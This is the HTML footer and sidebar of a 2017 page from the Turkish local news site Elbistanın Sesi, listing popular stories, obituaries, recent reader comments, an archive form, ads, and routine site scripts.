class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sehit-atesi-dustu-h37307.html" title="Elbistana şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/elbistana_sehit_atesi_dustu_h37307_04759.jpg" alt="Elbistana şehit ateşi düştü"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sehit-atesi-dustu-h37307.html" title="" ><span class="en-hit">1.</span> <strong>Elbistan’a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Fırat Kalkanı Harekatı kapsamında Suriye’nin El-Bab kentinde Elbistanlı...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/egitim-kultur/siir-kitabinin-gelirini-sehit-ailesine-bagislayacaklar-h37498.html" title="Şiir kitabının gelirini, şehit..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/01/siir_kitabinin_gelirini_sehit_ailesine_bagislayacaklar_h37498_c64f9.JPG" alt="Şiir kitabının gelirini, şehit..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/egitim-kultur/siir-kitabinin-gelirini-sehit-ailesine-bagislayacaklar-h37498.html" title="" ><span class="en-hit">2.</span> <strong>Şiir kitabının gelirini, şehit...</strong> <span class="en-spot en-hidden">Elbistan Tepebaşı İlkokulu 3/C sınıfı öğrencileri, kendi dizelerinden...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/esme-ceran-87-yasinda-h37276.html" title="Esme Ceran, 87 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/esme_ceran_87_yasinda_h37276_59e48.jpg" alt="Esme Ceran, 87 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/esme-ceran-87-yasinda-h37276.html" title="" ><span class="en-hit">3.</span> <strong>Esme Ceran, 87 yaşında</strong> <span class="en-spot en-hidden">Aslen Elbistan’a bağlı Doğan Mahallesi’nden merhum Ali ve merhume...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-ak-52-yasinda-h37294.html" title="Ahmet Ak 52 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/ahmet_ak_52_yasinda_h37294_0aaf3.jpg" alt="Ahmet Ak 52 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-ak-52-yasinda-h37294.html" title="" ><span class="en-hit">4.</span> <strong>Ahmet Ak 52 yaşında</strong> <span class="en-spot en-hidden">Çiçek mahallesinden Yahya ve Elif Ak ailesinin oğlu,</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-guzel-vatan-topragina-emanet-edildi-h37315.html" title="Şehit Uzman Onbaşı Güzel, vatan..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sehit_uzman_onbasi_guzel_vatan_topragina_emanet_edildi_h37315_92807.JPG" alt="Şehit Uzman Onbaşı Güzel, vatan..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-guzel-vatan-topragina-emanet-edildi-h37315.html" title="" ><span class="en-hit">5.</span> <strong>Şehit Uzman Onbaşı Güzel, vatan...</strong> <span class="en-spot en-hidden">Fırat Kalkanı Harekatı&#039;nın 128. gününde DEAŞ saldırısı...</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fadime-cakir-88-yasinda-h37584.html#comment_170283" title="" >Fani dünyadan hak dünyaya göç eden hanımefendiye...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/mezarsiz-iscilerin-davasinda-6-yil-sonra-karar-cikti-h37580.html#comment_170282" title="" >kömüre daha hızlı ve ekonomik ulaşmak...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/behsat-balyemez-31-yasinda-h37583.html#comment_170281" title="" >Görünmez kazaya sonucu hak dünyaya göç...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ese-fatma-kaya-76-yasinda-h37541.html#comment_170280" title="" >Fani dünyadan hak dünyaya göç eden hanımefendiye...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ekber-gultekin-anma-h37588.html#comment_170279" title="" >Baba dostumuz Ali Ekber abi Allah gani gani...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ekber-gultekin-anma-h37588.html#comment_170277" title="" >SAYGIYLA ANIYOR MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/egitim-kultur/siir-kitabinin-gelirini-sehit-ailesine-bagislayacaklar-h37498.html#comment_170275" title="" >Basta minik ögrencilerimiz olmak uzere...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ekber-gultekin-anma-h37588.html#comment_170274" title="" >Kıymetli arkadaşıma Allah&#39;tan rahmet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ekber-gultekin-anma-h37588.html#comment_170273" title="" >çok değerli bir insandı ALlah rahmet...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/sis-ve-buzlanma-kazalari-beraberinde-getirdi-7-yarali-h37571.html#comment_170270" title="" >Sahibimiz Yok bir Elbistan&#39;a vali gelmeZse...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" selected>21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" selected>Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2017" selected>2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> <option value="2014" >2014</option> <option value="2013" >2013</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:160px;height:260px;"> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=1" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/reklamaksu.gif" width="160" height="260" style="width:160px;height: 260px;border:0" alt="banner1" /></a></p> <p style="width:165px;"><a href="http://www.elbistaninsesi.com/banner.php?id=27" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/HSG_Tur.jpg&w=165&h=293&q=90" width="165" height="293" style="width:165px;height: 293px;border:0" alt="banner27" /></a></p> <p><a href="http://www.elbistaninsesi.com/banner.php?id=29" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/pekcan_Yekerleme_YNTERNET.jpg&w=160&h=285&q=90" width="160" height="285" style="width:160px;height: 285px;border:0" alt="banner29" /></a></p> <p><a href="http://www.elbistaninsesi.com/banner.php?id=25" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/06b88d5f-fea4-4442-942b-decf15244697111.jpg&w=165&h=206&q=90" width="165" height="206" style="width:165px;height: 206px;border:0" alt="banner25" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2017 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/#" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="#" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/logo2_1.png" alt="Hacı Öztürk 76 yaşında" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fhaci-ozturk-76-yasinda-h37594.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('37594', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> </body> </html> 